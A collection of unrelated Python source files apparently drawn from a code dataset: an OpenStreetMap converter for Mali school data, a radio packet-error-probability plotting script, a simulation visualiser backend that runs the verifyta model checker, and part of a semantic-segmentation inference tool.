# has_girl_latrines = entry.get('LATRINES_FILLES_SEPAREES') == '1'
nb_latrines = int(entry.get('NOMBRE_LATRINES')) \
if entry.get('NOMBRE_LATRINES') else 0
nb_teachers = int(entry.get('NBRE ENSEIGNANTS')) \
if entry.get('NBRE ENSEIGNANTS') else None
statuses = {
"Communautaire": "community",
"Medersa": "religious",
"Privé confessionnel": "religious",
"Privé laïc": "private",
"Public": "public"
}
water_options = {
"1) robinet ": "tap",
"2) forage fonctionnel": "working_drilling",
"3) puits non tarrissable": "inexhaustible_well",
"4) puits tarrissable": "exhaustible_well",
"5) pas de point d'eau": "no_water_point",
"indeterminé": "unknown",
"": "unknown"
}
water_point = water_options.get(entry.get('EAU_POTABLE'))
has_drinkable_water = water_point in [
'tap', 'working_drilling', 'inexhaustible_well', 'exhaustible_well']
# status are `Communautaire` or `Medersa` or `Privé confessionnel`
# or `Privé laïc` or `Public`
tags = {
'amenity': 'school',
'name': cleanName(entry.get('NOM_ETABLISSEMENT')),
'operator:type': statuses.get(entry.get('STATUT')),
'source': "UNICEF",
# school classification
'school:ML:academie': entry.get('AE'),
'school:ML:cap': entry.get('CAP'),
'isced:level': 1 if cycle == 1 else '2,3',
# 'school:first_cycle': yesno(cycle == 1),
# 'school:second_cycle': yesno(cycle == 2),
# Students
# 'school:nb_schoolboys_2012': int(entry.get('GARCONS')),
# 'school:nb_schoolgirls_2012': int(entry.get('FILLES')),
'capacity:pupils': int(entry.get('TOTAL')),
'drinking_water': yesno(has_drinkable_water),
'restaurant':
yesno(entry.get('PRESENCE_RESTAURANT') == '1'),
'toilets': yesno(has_latrines),
'toilets:number': nb_latrines,
}
# admin levels of Mali
# if entry.get('Région'):
# tags.update({'is_in:region': clean(entry.get('Région'))})
if entry.get('Cercle'):
tags.update({'is_in:cercle': clean(entry.get('Cercle'))})
if entry.get('Commune'):
tags.update({'is_in:commune': clean(entry.get('Commune'))})
if entry.get('Localites'):
tags.update({'is_in:village': clean(entry.get('Localites')),
'addr:city': clean(entry.get('Localites'))})
# School code
# if entry.get('CODE_ETABLISSEMENT'):
# tags.update({'school:ML:code': entry.get('CODE_ETABLISSEMENT')})
# if has_latrines:
# tags.update({'school:has_separated_girls_latrines':
# yesno(has_girl_latrines)})
if has_drinkable_water:
tags.update({'drinking_water:type': water_point})
tags.update({'drinking_water:seasonal':
yesno(water_point == 'exhaustible_well')})
if nb_teachers is not None:
tags.update({'capacity:teachers': nb_teachers})
data = {
'tags': getTags(**tags),
'id': -lnum,
'changeset': -lnum,
'lat': entry.get('Y'),
'lon': entry.get('X'),
'timestamp': getTimestamp()
}
return node_tmpl.format(**data)
def getBounds(nodes):
minlat = minlon = maxlat = maxlon = None
for node, node_latlon in nodes:
lat, lon = node_latlon
if lat > maxlat or maxlat is None:
maxlat = lat
if lat < minlat or minlat is None:
minlat = lat
if lon > maxlon or maxlon is None:
maxlon = lon
if lon < minlon or minlon is None:
minlon = lon
return minlat, minlon, maxlat, maxlon
def main(filename):
headers = ['Région', 'AE', 'CAP', 'Cercle', 'Commune',
'NOM_ETABLISSEMENT', 'Localites', 'X', 'Y',
'CODE_ETABLISSEMENT', 'Localisation', 'CYCLE',
'STATUT', 'PRESENCE_RESTAURANT', 'PRESENCE_LATRINES',
'LATRINES_FILLES_SEPAREES', 'NOMBRE_LATRINES',
'EAU_POTABLE', 'GARCONS', 'FILLES', 'TOTAL',
'NBRE ENSEIGNANTS']
folder = 'changesets'
input_csv_file = open(filename, 'r')
csv_reader = csv.DictReader(input_csv_file, fieldnames=headers)
# create changeset folder if exist
try:
os.mkdir(folder)
except:
pass
def write_file(academy, nodes):
print("Writting ACADEMIE {}/{}".format(academy, len(nodes)))
minlat, minlon, maxlat, maxlon = getBounds(nodes)
output_osm_file = open(os.path.join(folder,
'{}.osm'.format(academy)), 'w')
output_osm_file.write(xml_head.format(
minlat=minlat, minlon=minlon, maxlat=maxlat, maxlon=maxlon))
for node, node_latlon in nodes:
output_osm_file.write(node.encode('utf-8'))
output_osm_file.write('\n')
output_osm_file.write(xml_tail)
output_osm_file.close()
academies = {}
for entry in csv_reader:
if csv_reader.line_num == 1:
continue
# don't export data without coordinates
if not entry.get('X') or not entry.get('Y'):
continue
ac = clean(entry.get('AE')).replace(' ', '-')
if ac not in academies.keys():
academies[ac] = []
print(cleanName(entry.get('NOM_ETABLISSEMENT')))
school_node = getNode(entry, csv_reader.line_num)
school_latlon = (float(entry.get('Y')), float(entry.get('X')))
academies[ac].append((school_node, school_latlon))
input_csv_file.close()
for ac, nodes in academies.items():
write_file(ac, nodes)
print("Export complete.")
if __name__ == '__main__':
if len(sys.argv) < 2:
print("You must pass the MLI_schools.csv path")
sys.exit(1)
main(sys.argv[1])
``` |
{
"source": "Joklost/masters",
"score": 3
} |
#### File: tools/graphs/pep.py
```python
from typing import List
import math
THERMAL_NOISE = -119.66
NOISE_FIGURE = 4.2
def lin(log_):
return math.pow(10, log_ / 10)
def log(lin_):
return 10 * math.log10(lin_)
def pepe(rssi: float, packetsize: int, interference: List[float]):
p_n = lin(THERMAL_NOISE + NOISE_FIGURE)
p_i = 0.0
for rssi_i_db in interference:
p_i += lin(rssi_i_db)
p_ni = p_n + p_i
p_ni_db = log(p_ni)
snir_db = rssi - p_ni_db
snir = lin(snir_db)
bep = 0.5 * math.erfc(math.sqrt(snir / 2.0))
pep = 1.0 - math.pow(1.0 - bep, float(packetsize) * 8.0)
return pep
def main():
min = -112
max = -102
step = 0.1
curr = min
print('\\addplot[very thick, solid, cyan!50!black] coordinates {', end='')
while curr < max:
rssi = round(curr, 1)
pep = pepe(rssi, 20, [])
print(f'({rssi},{pep})', end='')
curr += step
print('};')
min = -70
max = -60
step = 0.1
curr = min
print('\\addplot[very thick, solid, cyan!50!black] coordinates {', end='')
while curr < max:
rssi = round(curr, 1)
pep = pepe(rssi, 20, [-74.042])
print(f'({rssi},{pep})', end='')
curr += step
print('};', end='')
if __name__ == '__main__':
main()
```
#### File: visualiser/backend/engine.py
```python
import glob
from subprocess import Popen, PIPE, STDOUT
import os
from backend.smc2py import parseEngineStdout
import math
import copy
# validate data and proxy to real functions
def execute(data):
models = list_models()['models']
if 'type' not in data:
return {'error': 'No type recieved'}
if data['type'] not in ['log', 'log+rssi']:
if 'model' not in data:
return {'error': 'No Model received'}
if data['model'] not in models:
return {'error': 'Model not available: ' + data['model'] + " use one of " + str(models)}
if data['type'] == 'static':
if 'topology' in data:
if data['topology'] == 'grid':
if 'number_of_nodes' in data and 'node_init_time' in data and 'duration' in data:
nn = 0
it = 0
dur = 0
try:
nn = int(data['number_of_nodes'])
except Exception:
{'error': "number_of_nodes is not a number"}
try:
it = int(data['node_init_time'])
except Exception:
{'error': "node_init_time is not a number"}
try:
dur = int(data['duration'])
except Exception:
{'error': "duration is not a number"}
return run_static_grid(data['model'], nn, it, dur)
else:
return {'error': 'Missing arguments for simulation'}
else:
return {'error': 'Unknown topology'}
else:
return {'error': "No topology received"}
error, parsed, edges = None, None, None
if data['type'] in ['gps', 'log', 'log+rssi']:
if 'gps_data' not in data:
return {'error': "No GPS-log"}
if data['type'] == 'log+rssi':
error, parsed, edges = parse_gps(data['gps_data'], with_rssi=True)
else:
error, parsed, edges = parse_gps(data['gps_data'])
if error is not None:
return error
if data['type'] in ['log', 'log+rssi']:
return run_log(0, -1, parsed, edges)
if data['type'] == 'gps':
fdur = 0
tdur = -1
if 'from_duration' in data and len(data['from_duration'].strip()) > 0:
try:
fdur = int(data['from_duration'])
except Exception:
return {'error': "from_duration is not a number"}
if 'to_duration' in data and len(data['to_duration'].strip()) > 0:
try:
tdur = int(data['to_duration'])
except Exception:
return {'error': "to_duration is not a number"}
return run_gps(fdur, tdur, parsed)
return {'error': "Unknown type or topology"}
def parse_gps(data, with_rssi: bool = False):
raw = data.splitlines()
parsed = []
edges = {} if with_rssi else None
for i in range(len(raw)):
if '#' in raw[i] or not raw[i].strip():
continue
entry = raw[i].split(",")
if entry[-1] == "":
del entry[-1]
if len(entry) < 4:
return file_error(i, 'less than four entries'), None, None
id = 0
lat = 0
lng = 0
ts = 0
try:
id = int(entry[0])
except Exception:
return file_error(i, 'entry 0 is not an id'), None, None
if id < 0:
return file_error(i, 'entry 0 is not an id'), None, None
try:
lat = float(entry[1])
except Exception:
return file_error(i, 'entry 0 is not a latitude'), None, None
if lat < -90 or lat > 90:
return file_error(i, 'entry 0 is not a latitude'), None, None
try:
lng = float(entry[2])
except Exception:
return file_error(i, 'entry 0 is not a latitude'), None, None
if lng < -180 or lng > 180:
return file_error(i, 'entry 0 is not a latitude'), None, None
try:
ts = float(entry[3])
except Exception:
return file_error(i, 'entry 3 is not a timestamp'), None, None
if ts < 0:
return file_error(i, 'entry 3 is not a timestamp'), None, None
# if log contains rssi values
if with_rssi:
for j in range(5, len(entry), 2):
if id not in edges:
edges[id] = {}
if ts not in edges[id]:
edges[id][ts] = {}
edges[id][ts][int(entry[j - 1])] = entry[j]
parsed.append((id, lat, lng, ts))
return None, parsed, edges
def file_error(line, message):
return {'error': 'Line ' + str(line) + ' - ' + message}
model_folder = "backend/models/"
def list_models():
res = []
postfix = ".xml"
for file in glob.glob(model_folder + "/*" + postfix):
model = str(file)
res.append(model[len(model_folder): - len(postfix)])
return {"models": res}
def get_id(data, first):
last = first
while data[last] != ']':
last += 1
return (data[first: last], last)
def run_static_grid(model, num_nodes, init_time, duration):
if num_nodes <= 0:
return {'error': 'Expected at least one node'}
if num_nodes >= 10000:
return {'error': 'Expected less than 10000 nodes'}
if init_time < 0:
return {'error': 'Expected at least some init time'}
if init_time >= duration:
return {'error': 'Expected duration to be larger than init_time'}
path = model_folder + "/" + model + ".xml"
if not os.path.isfile(path):
return {'error': 'Could not find ' + str(path)}
p = Popen(['verifyta', "-W", "-s", path], stdout=PIPE, stdin=PIPE, stderr=PIPE, universal_newlines=True)
lines = str(duration) + " " + str(num_nodes) + " "
for n in range(num_nodes):
lines += str(0) + " "
lines += str(init_time) + " "
lines += str(duration) + " "
(stdout, stderr) = p.communicate(input=lines)
data = parseEngineStdout(stdout)
minlat = 57.013219
minlng = 9.991016
maxlat = 57.017997
maxlng = 10.001937
nodes = {}
square = int(math.sqrt(num_nodes))
dlat = (maxlat - minlat) / square
dlon = (maxlng - minlng) / square
maxlat = minlat
maxlng = minlng
for i in range(num_nodes):
lat = minlat + int(i / square) * dlat
lng = minlng + int(i % square) * dlon
maxlat = max(maxlat, lat)
maxlng = max(maxlng, lng)
fields = data[0].variables()
no = 0
edges = {}
for field in fields:
raw = data[0].raw(no)
if field[7] == 'N': # OUTPUT_NODES[
(id, last) = get_id(field, 12)
lat = minlat + int(int(id) / square) * dlat
lng = minlng + int(int(id) % square) * dlon
maxlat = max(maxlat, lat)
maxlng = max(maxlng, lng)
field = field[last + 2:]
if id not in nodes:
nodes[id] = []
num = 0
lastval = 0
for (ts, val) in raw:
while num < len(nodes[id]) and nodes[id][num]['timestamp'] < ts:
if num is not 0:
nodes[id][num][field] = lastval
num += 1
lastval = val
if num == len(nodes[id]) and num == 0:
nodes[id].append({'lat': lat, 'lng': lng, 'timestamp': ts, field: val})
elif num < len(nodes[id]) and nodes[id][num]['timestamp'] == ts:
nodes[id][num][field] = val
else:
nodes[id].insert(num, copy.deepcopy(nodes[id][num - 1]))
nodes[id][num][field] = val
nodes[id][num]['timestamp'] = ts
elif field[7] == 'E': # OUTPUT_EDGE[
(id, last) = get_id(field, 12)
(oid, last) = get_id(field, last + 2)
if id == oid:
no += 1
continue
field = field[last + 2:]
if id not in edges:
edges[id] = {}
if oid not in edges[id]:
edges[id][oid] = []
num = 0
lastval = 0
for (ts, val) in raw:
while num < len(edges[id][oid]) and edges[id][oid][num]['timestamp'] < ts:
if num is not 0:
edges[id][oid][num][field] = lastval
num += 1
lastval = val
if num == len(edges[id][oid]) and num == 0:
edges[id][oid].append({'timestamp': ts, field: val, 'dest': int(oid)})
elif num < len(edges[id][oid]) and edges[id][oid][num]['timestamp'] == ts:
edges[id][oid][num][field] = val
else:
edges[id][oid].insert(num, copy.deepcopy(edges[id][oid][num - 1]))
edges[id][oid][num][field] = val
edges[id][oid][num]['timestamp'] = ts
no += 1
for n in nodes:
if nodes[n][-1]['timestamp'] != duration:
nodes[n].append(copy.deepcopy(nodes[n][-1]))
nodes[n][-1]['timestamp'] = duration
for n in edges:
for n2 in edges[n]:
if edges[n][n2][-1]['timestamp'] != duration:
edges[n][n2].append(copy.deepcopy(edges[n][n2][-1]))
edges[n][n2][-1]['timestamp'] = duration
return {'nodes': nodes, 'edges': edges, 'min_lat': minlat, 'max_lat': maxlat, 'min_lng': minlng, 'max_lng': maxlng,
'first_time': 0, 'last_time': duration}
def run_gps(fdur, tdur, data):
if tdur is not -1 and tdur <= fdur:
return {'error': 'From duration should be smaller than to duration (' + str(fdur) + ", " + str(tdur) + ")"}
return {'error', 'Not yet implemented'}
def run_log(fdur, tdur, data, log_edges):
if tdur is not -1 and tdur <= fdur:
return {'error': 'From duration should be smaller than to duration (' + str(fdur) + ", " + str(tdur) + ")"}
nodes = {}
edges = {}
minlat = math.inf
maxlat = -math.inf
minlng = math.inf
maxlng = -math.inf
mints = math.inf
maxts = -math.inf
for row in data:
nd = {'lat': row[1], 'lng': row[2], 'timestamp': row[3]}
if row[3] < fdur or (tdur is not -1 and row[3] > tdur):
continue
if row[0] not in nodes:
nodes[row[0]] = [nd]
else:
nodes[row[0]].append(nd)
minlat = min(minlat, row[1])
maxlat = max(maxlat, row[1])
minlng = min(minlng, row[2])
maxlng = max(maxlng, row[2])
mints = min(mints, row[3])
maxts = max(maxts, row[3])
if len(nodes) == 0:
return {'error': 'No nodes within the duration (or file is empty or could not be parsed)'}
for key in nodes:
nodes[key].sort(key=lambda el: el['timestamp'])
if log_edges is None:
for id in nodes:
for step in nodes[id]:
for other in nodes:
if (id == other
or nodes[other][0]['timestamp'] > step['timestamp']
or nodes[other][-1]['timestamp'] < step['timestamp']):
continue
nd = {'timestamp': step['timestamp'], 'dest': other}
if id not in edges:
edges[id] = {}
if other not in edges[id]:
edges[id][other] = []
edges[id][other].append(nd)
else:
if len(log_edges) == 0:
return {'error': "Log does not contain rssi measurements"}
for nid in nodes.keys():
for node in nodes[nid]:
for nid2 in nodes:
if nid == nid2:
continue
if (node['timestamp'] in log_edges[nid]
and node['timestamp'] in log_edges[nid2]
and nid2 in log_edges[nid][node['timestamp']]
and nid in log_edges[nid2][node['timestamp']]):
nd = {'timestamp': node['timestamp'], 'dest': nid2,
'rssi': int(log_edges[nid][node['timestamp']][nid2])}
nd2 = {'timestamp': node['timestamp'], 'dest': nid,
'rssi': int(log_edges[nid2][node['timestamp']][nid])}
if nid not in edges:
edges[nid] = {}
if nid2 not in edges:
edges[nid2] = {}
if nid not in edges[nid2]:
edges[nid2][nid] = []
if nid2 not in edges[nid]:
edges[nid][nid2] = []
edges[nid][nid2].append(nd)
edges[nid2][nid].append(nd2)
for key in edges:
for k2 in edges[key]:
edges[key][k2].sort(key=lambda el: el['timestamp'])
return {'nodes': nodes, 'edges': edges, 'min_lat': minlat, 'max_lat': maxlat, 'min_lng': minlng,
'max_lng': maxlng,
'first_time': mints, 'last_time': maxts}
``` |
{
"source": "Jokoe66/mseg-semantic",
"score": 2
} |
#### File: mseg_semantic/tool/inference_task.py
```python
import cv2
import imageio
import logging
import numpy as np
import os
from pathlib import Path
import pdb
import time
import torch
import torch.nn as nn
import torch.utils.data
import torch.backends.cudnn as cudnn
from typing import List, Tuple
import tqdm
import mmcv
from mseg.utils.dir_utils import check_mkdir, create_leading_fpath_dirs
from mseg.utils.names_utils import get_universal_class_names
from mseg.utils.mask_utils_detectron2 import Visualizer
from mseg.utils.resize_util import resize_img_by_short_side
from mseg.taxonomy.taxonomy_converter import TaxonomyConverter
from mseg.taxonomy.naive_taxonomy_converter import NaiveTaxonomyConverter
from mseg_semantic.model.pspnet import PSPNet
from mseg_semantic.utils.avg_meter import AverageMeter
from mseg_semantic.utils.normalization_utils import (
get_imagenet_mean_std,
normalize_img
)
from mseg_semantic.utils.cv2_video_utils import VideoWriter, VideoReader
from mseg_semantic.utils import dataset, transform, config
from mseg_semantic.utils.img_path_utils import dump_relpath_txt
"""
Given a specified task, run inference on it using a pre-trained network.
Used for demos, and for testing on an evaluation dataset.
If projecting universal taxonomy into a different evaluation taxonomy,
the argmax comes *after* the linear mapping, so that probabilities can be
summed first.
Note: "base size" should be the length of the shorter side of the desired
inference image resolution. Note that the official PSPNet repo
(https://github.com/hszhao/semseg/blob/master/tool/test.py) treats
base_size as the longer side, which we found less intuitive given
screen resolution is generally described by shorter side length.
"base_size" is a very important parameter and will
affect results significantly.
"""
_ROOT = Path(__file__).resolve().parent.parent.parent
def get_logger():
"""
"""
logger_name = "main-logger"
logger = logging.getLogger(logger_name)
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
handler.setFormatter(logging.Formatter(fmt))
logger.addHandler(handler)
return logger
logger = get_logger()
def get_unique_stem_from_last_k_strs(fpath: str, k: int = 4) -> str:
"""
Args:
- fpath
- k
Returns:
- unique_stem: string
"""
parts = Path(fpath).parts
unique_stem = '_'.join(parts[-4:-1]) + '_' + Path(fpath).stem
return unique_stem
class ToFlatLabel(object):
def __init__(self, tc_init, dataset):
self.dataset = dataset
self.tc = tc_init
def __call__(self, image, label):
return image, self.tc.transform_label(label, self.dataset)
def resize_by_scaled_short_side(
image: np.ndarray,
base_size: int,
scale: float
) -> np.ndarray:
"""
Args:
- image: Numpy array of shape ()
- scale:
Returns:
- image_scale:
"""
h, w, _ = image.shape
short_size = round(scale * base_size)
new_h = short_size
new_w = short_size
# Preserve the aspect ratio
if h > w:
new_h = round(short_size/float(w)*h)
else:
new_w = round(short_size/float(h)*w)
image_scale = cv2.resize(image, (new_w, new_h), interpolation=cv2.INTER_LINEAR)
return image_scale
def pad_to_crop_sz(
image: np.ndarray,
crop_h: int,
crop_w: int,
mean: Tuple[float,float,float]
) -> Tuple[np.ndarray,int,int]:
"""
Network input should be at least crop size, so we pad using mean values if
provided image is too small. No rescaling is performed here.
We use cv2.copyMakeBorder to copy the source image into the middle of a
destination image. The areas to the left, to the right, above and below the
copied source image will be filled with extrapolated pixels, in this case the
provided mean pixel intensity.
Args:
- image:
- crop_h: integer representing crop height
- crop_w: integer representing crop width
Returns:
- image: Numpy array of shape (crop_h x crop_w) representing a
square image, with short side of square is at least crop size.
- pad_h_half: half the number of pixels used as padding along height dim
- pad_w_half" half the number of pixels used as padding along width dim
"""
ori_h, ori_w, _ = image.shape
pad_h = max(crop_h - ori_h, 0)
pad_w = max(crop_w - ori_w, 0)
pad_h_half = int(pad_h / 2)
pad_w_half = int(pad_w / 2)
if pad_h > 0 or pad_w > 0:
image = cv2.copyMakeBorder(
src=image,
top=pad_h_half,
bottom=pad_h - pad_h_half,
left=pad_w_half,
right=pad_w - pad_w_half,
borderType=cv2.BORDER_CONSTANT,
value=mean
)
return image, pad_h_half, pad_w_half
def imread_rgb(img_fpath: str) -> np.ndarray:
"""
Returns:
- RGB 3 channel nd-array with shape H * W * 3
"""
bgr_img = cv2.imread(img_fpath, cv2.IMREAD_COLOR)
rgb_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2RGB)
rgb_img = np.float32(rgb_img)
return rgb_img
class InferenceTask:
def __init__(self,
args,
base_size: int,
crop_h: int,
crop_w: int,
input_file: str,
output_taxonomy: str,
scales: List[float],
use_gpu: bool = True
):
"""
We always use the ImageNet mean and standard deviation for normalization.
mean: 3-tuple of floats, representing pixel mean value
std: 3-tuple of floats, representing pixel standard deviation
'args' should contain at least two fields (shown below).
Args:
- args:
- base_size:
- crop_h: integer representing crop height, e.g. 473
- crop_w: integer representing crop width, e.g. 473
- input_file: could be absolute path to .txt file, .mp4 file,
or to a directory full of jpg images
- output_taxonomy
- scales
- use_gpu
"""
self.args = args
assert isinstance(self.args.img_name_unique, bool)
assert isinstance(self.args.print_freq, int)
assert isinstance(self.args.num_model_classes, int)
assert isinstance(self.args.model_path, str)
self.pred_dim = self.args.num_model_classes
self.base_size = base_size
self.crop_h = crop_h
self.crop_w = crop_w
self.input_file = input_file
self.output_taxonomy = output_taxonomy
self.scales = scales
self.use_gpu = use_gpu
self.mean, self.std = get_imagenet_mean_std()
self.model = self.load_model(args)
self.softmax = nn.Softmax(dim=1)
self.gray_folder = None # optional, intended for dataloader use
self.data_list = None # optional, intended for dataloader use
if self.output_taxonomy != 'universal':
assert isinstance(self.args.dataset, str)
self.dataset_name = args.dataset
self.tc = TaxonomyConverter()
if self.args.arch == 'psp':
assert isinstance(self.args.zoom_factor, int)
assert isinstance(self.args.network_name, int)
self.id_to_class_name_map = {
i: classname for i, classname in enumerate(get_universal_class_names())
}
# indicate which scales were used to make predictions
# (multi-scale vs. single-scale)
self.scales_str = 'ms' if len(args.scales) > 1 else 'ss'
def load_model(self, args):
"""
Load Pytorch pre-trained model from disk of type
torch.nn.DataParallel. Note that
`args.num_model_classes` will be size of logits output.
Args:
- args:
Returns:
- model
"""
if args.arch == 'psp':
model = PSPNet(
layers=args.layers,
classes=args.num_model_classes,
zoom_factor=args.zoom_factor,
pretrained=False,
network_name=args.network_name
)
elif args.arch == 'hrnet':
from mseg_semantic.model.seg_hrnet import get_configured_hrnet
# note apex batchnorm is hardcoded
model = get_configured_hrnet(args.num_model_classes, load_imagenet_model=False)
elif args.arch == 'hrnet_ocr':
from mseg_semantic.model.seg_hrnet_ocr import get_configured_hrnet_ocr
model = get_configured_hrnet_ocr(args.num_model_classes)
# logger.info(model)
model = torch.nn.DataParallel(model)
if self.use_gpu:
model = model.cuda()
cudnn.benchmark = True
if os.path.isfile(args.model_path):
logger.info(f"=> loading checkpoint '{args.model_path}'")
if self.use_gpu:
checkpoint = torch.load(args.model_path)
else:
checkpoint = torch.load(args.model_path, map_location='cpu')
model.load_state_dict(checkpoint['state_dict'], strict=False)
logger.info(f"=> loaded checkpoint '{args.model_path}'")
else:
raise RuntimeError(f"=> no checkpoint found at '{args.model_path}'")
return model
def execute(self) -> None:
"""
Execute the demo, i.e. feed all of the desired input through the
network and obtain predictions. Gracefully handles .txt,
or video file (.mp4, etc), or directory input.
"""
logger.info('>>>>>>>>>>>>>>>> Start inference task >>>>>>>>>>>>>>>>')
self.model.eval()
suffix = self.input_file[-4:]
is_dir = os.path.isdir(self.input_file)
is_img = suffix in ['.png', '.jpg']
is_vid = suffix in ['.mp4', '.avi', '.mov']
if is_img:
self.render_single_img_pred()
elif is_dir:
# argument is a path to a directory
self.create_path_lists_from_dir()
test_loader = self.create_test_loader()
self.execute_on_dataloader(test_loader)
elif is_vid:
# argument is a video
self.execute_on_video()
elif not is_dir and not is_img and self.args.dataset != 'default':
# evaluate on a train or test dataset
test_loader = self.create_test_loader()
self.execute_on_dataloader(test_loader)
else:
logger.info('Error: Unknown input type')
logger.info('<<<<<<<<<<<<<<<<< Inference task completed <<<<<<<<<<<<<<<<<')
def render_single_img_pred(self, min_resolution: int = 1080):
"""
Since overlaid class text is difficult to read below 1080p, we upsample
predictions.
"""
in_fname_stem = Path(self.input_file).stem
output_gray_fpath = f'{in_fname_stem}_gray.jpg'
output_demo_fpath = f'{in_fname_stem}_overlaid_classes.jpg'
logger.info(f'Write image prediction to {output_demo_fpath}')
rgb_img = imread_rgb(self.input_file)
pred_label_img = self.execute_on_img(rgb_img)
# avoid blurry images by upsampling RGB before overlaying text
if np.amin(rgb_img.shape[:2]) < min_resolution:
rgb_img = resize_img_by_short_side(rgb_img, min_resolution, 'rgb')
pred_label_img = resize_img_by_short_side(pred_label_img, min_resolution, 'label')
metadata = None
frame_visualizer = Visualizer(rgb_img, metadata)
overlaid_img = frame_visualizer.overlay_instances(
label_map=pred_label_img,
id_to_class_name_map=self.id_to_class_name_map
)
imageio.imwrite(output_demo_fpath, overlaid_img)
imageio.imwrite(output_gray_fpath, pred_label_img)
def create_path_lists_from_dir(self) -> None:
"""
Populate a .txt file with relative paths that will be used to create
a Pytorch dataloader.
Args:
- None
Returns:
- None
"""
self.args.data_root = self.input_file
txt_output_dir = str(Path(f'{_ROOT}/temp_files').resolve())
txt_save_fpath = dump_relpath_txt(self.input_file, txt_output_dir)
self.args.test_list = txt_save_fpath
def create_test_loader(self):
"""
Create a Pytorch dataloader from a dataroot and list of
relative paths.
"""
test_transform = transform.Compose([transform.ToTensor()])
test_data = dataset.SemData(
split=self.args.split,
data_root=self.args.data_root,
data_list=self.args.test_list,
transform=test_transform
)
index_start = self.args.index_start
if self.args.index_step == 0:
index_end = len(test_data.data_list)
else:
index_end = min(index_start + args.index_step, len(test_data.data_list))
test_data.data_list = test_data.data_list[index_start:index_end]
self.data_list = test_data.data_list
test_loader = torch.utils.data.DataLoader(
test_data,
batch_size=1,
shuffle=False,
num_workers=self.args.workers,
pin_memory=True
)
return test_loader
def execute_on_img_single(self, image: np.ndarray) -> np.ndarray:
"""
Rather than feeding in crops w/ sliding window across the full-res image, we
downsample/upsample the image to a default inference size. This may differ
from the best training size.
For example, if trained on small images, we must shrink down the image in
testing (preserving the aspect ratio), based on the parameter "base_size",
which is the short side of the image.
Args:
- image: Numpy array representing RGB image
Returns:
- gray_img: prediction, representing predicted label map
"""
h, w, _ = image.shape
scale = 1.
image_scale = resize_by_scaled_short_side(image, self.base_size, scale)
prediction = self.scale_process_cuda(image_scale, h, w)
prediction = prediction.argmax(axis=2)
gray_img = np.uint8(prediction)
return gray_img
def execute_on_img(self, image: np.ndarray) -> np.ndarray:
"""
Rather than feeding in crops w/ sliding window across the full-res image, we
downsample/upsample the image to a default inference size. This may differ
from the best training size.
For example, if trained on small images, we must shrink down the image in
testing (preserving the aspect ratio), based on the parameter "base_size",
which is the short side of the image.
Args:
- image: Numpy array representing RGB image
Returns:
- gray_img: prediction, representing predicted label map
"""
h, w, _ = image.shape
prediction = np.zeros((h, w, self.pred_dim), dtype=float)
prediction = torch.Tensor(prediction).cuda()
for scale in self.scales:
image_scale = resize_by_scaled_short_side(image, self.base_size, scale)
prediction = prediction + torch.Tensor(self.scale_process_cuda(image_scale, h, w)).cuda()
prediction /= len(self.scales)
prediction = torch.argmax(prediction, axis=2)
prediction = prediction.data.cpu().numpy()
gray_img = np.uint8(prediction)
return gray_img
def execute_on_video(self, max_num_frames: int = 5000, min_resolution: int = 1080) -> None:
"""
input_file is a path to a video file.
Read frames from an RGB video file, and write overlaid
predictions into a new video file.
Args:
- None
Returns:
- None
"""
in_fname_stem = Path(self.input_file).stem
out_fname = f'{in_fname_stem}_{self.args.model_name}_universal'
out_fname += f'_scales_{self.scales_str}_base_sz_{self.args.base_size}.mp4'
output_video_fpath = f'{_ROOT}/temp_files/{out_fname}'
create_leading_fpath_dirs(output_video_fpath)
logger.info(f'Write video to {output_video_fpath}')
writer = VideoWriter(output_video_fpath)
reader = VideoReader(self.input_file)
for frame_idx in range(reader.num_frames):
logger.info(f'On image {frame_idx}/{reader.num_frames}')
rgb_img = reader.get_frame()
if frame_idx > max_num_frames:
break
pred_label_img = self.execute_on_img(rgb_img)
# avoid blurry images by upsampling RGB before overlaying text
if np.amin(rgb_img.shape[:2]) < min_resolution:
rgb_img = resize_img_by_short_side(rgb_img, min_resolution, 'rgb')
pred_label_img = resize_img_by_short_side(pred_label_img, min_resolution, 'label')
metadata = None
frame_visualizer = Visualizer(rgb_img, metadata)
output_img = frame_visualizer.overlay_instances(
label_map=pred_label_img,
id_to_class_name_map=self.id_to_class_name_map
)
writer.add_frame(output_img)
reader.complete()
writer.complete()
def execute_on_dataloader(self, test_loader: torch.utils.data.dataloader.DataLoader):
"""
Args:
- test_loader:
Returns:
- None
"""
if self.args.save_folder == 'default':
self.args.save_folder = f'{_ROOT}/temp_files/{self.args.model_name}_{self.args.dataset}_universal_{self.scales_str}/{self.args.base_size}'
os.makedirs(self.args.save_folder, exist_ok=True)
gray_folder = os.path.join(self.args.save_folder, 'gray')
self.gray_folder = gray_folder
check_mkdir(self.gray_folder)
data_time = AverageMeter()
batch_time = AverageMeter()
end = time.time()
results = dict() # path: label_map
for i, (input, _) in enumerate(tqdm.tqdm(test_loader)):
data_time.update(time.time() - end)
# convert Pytorch tensor -> Numpy
input = np.squeeze(input.numpy(), axis=0)
image = np.transpose(input, (1, 2, 0))
gray_img = self.execute_on_img_single(image)
batch_time.update(time.time() - end)
end = time.time()
image_name, _ = self.data_list[i]
img_id = image_name[len(self.input_file):]
results[img_id] = gray_img
# todo: update to time remaining.
if 0 and ((i + 1) % self.args.print_freq == 0) or (i + 1 == len(test_loader)):
logger.info('Test: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, len(test_loader),
data_time=data_time,
batch_time=batch_time))
mmcv.dump(results, os.path.join(gray_folder, 'label_maps.pkl'))
def scale_process_cuda(self, image: np.ndarray, h: int, w: int, stride_rate: float = 2/3):
""" First, pad the image. If input is (384x512), then we must pad it up to shape
to have shorter side "scaled base_size".
Then we perform the sliding window on this scaled image, and then interpolate
(downsample or upsample) the prediction back to the original one.
At each pixel, we increment a counter for the number of times this pixel
has passed through the sliding window.
Args:
- image: Array, representing image where shortest edge is adjusted to base_size
- h: integer representing raw image height, e.g. for NYU it is 480
- w: integer representing raw image width, e.g. for NYU it is 640
- stride_rate
Returns:
- prediction: predictions with shorter side equal to self.base_size
"""
start1 = time.time()
ori_h, ori_w, _ = image.shape
image, pad_h_half, pad_w_half = pad_to_crop_sz(image, self.crop_h, self.crop_w, self.mean)
new_h, new_w, _ = image.shape
stride_h = int(np.ceil(self.crop_h*stride_rate))
